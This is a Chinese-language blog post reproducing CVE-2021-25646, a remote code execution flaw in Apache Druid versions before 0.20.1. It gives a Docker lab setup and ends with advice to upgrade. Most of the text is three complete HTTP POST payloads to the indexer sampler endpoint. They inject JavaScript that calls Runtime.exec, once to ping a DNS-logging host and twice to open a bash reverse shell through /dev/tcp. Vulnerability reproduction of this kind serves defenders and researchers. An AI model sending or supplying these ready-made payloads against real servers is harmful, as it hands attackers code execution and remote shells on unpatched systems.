2021-02-02Apache Druid 命令执行漏洞（CV

（）

Apache Druid 命令执行漏洞（CVE-2021-25646）

一、漏洞描述

Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中，默认已被禁用。但是，在Druid 0.20.0及更低版本中，经过身份验证的用户发送恶意请求，利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码，控制服务器。

二、影响版本

Apache Druid < 0.20.1

三、漏洞环境&漏洞复现

Docker环境：

dockerpull fokkodriesprong/docker-druid dockerrun --rm -i -p 8888:8888 fokkodriesprong/docker-druid

启动访问：

漏洞复现：

POC:

POST/druid/indexer/v1/samplerHTTP/1.1Host: ip:protUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1045Connection: close​{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

1、DNSlog:

DNS记录：

具体数据包：

POST/druid/indexer/v1/samplerHTTP/1.1Host: 127.0.0.1:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1018Connection: close​{"type":"index","spec": {"ioConfig": {"type":"index","inputSource": {"type":"inline","data":"{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"},"inputFormat": {"type":"json","keepNullColumns":true}},"dataSchema": {"dataSource":"sample","timestampSpec": {"column":"timestamp","format":"iso"},"dimensionsSpec": {},"transformSpec": {"transforms": [],"filter": {"type":"javascript","dimension":"added","function":"function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping gpg7qd.dnslog.cn')}","": {"enabled":true}}}},"type":"index","tuningConfig": {"type":"index"}},"samplerConfig": {"numRows":500,"timeoutMs":15000}}

2、反弹shell操作

具体数据包：

POST/druid/indexer/v1/samplerHTTP/1.1Host: 127.0.0.1:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1044Connection: close​{"type":"index","spec": {"ioConfig": {"type":"index","inputSource": {"type":"inline","data":"{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"},"inputFormat": {"type":"json","keepNullColumns":true}},"dataSchema": {"dataSource":"sample","timestampSpec": {"column":"timestamp","format":"iso"},"dimensionsSpec": {},"transformSpec": {"transforms": [],"filter": {"type":"javascript","dimension":"added","function":"function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')}","": {"enabled":true}}}},"type":"index","tuningConfig": {"type":"index"}},"samplerConfig": {"numRows":500,"timeoutMs":15000}}

四、安全建议

建议广大用户及时更新Apache Druid，下载链接为：

https://druid.apache.org/downloads.html

https://github.com/apache/druid/releases/tag/druid-0.20.1

参考：

https://www.secpulse.com/archives/152981.html

https://mp.weixin.qq.com/s/ToGaV-wR28Cx9K-aBC7Lyg

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

​安全路上，与你并肩前行！！！！

欢迎添加本公众号作者微信交流，添加时备注一下“公众号”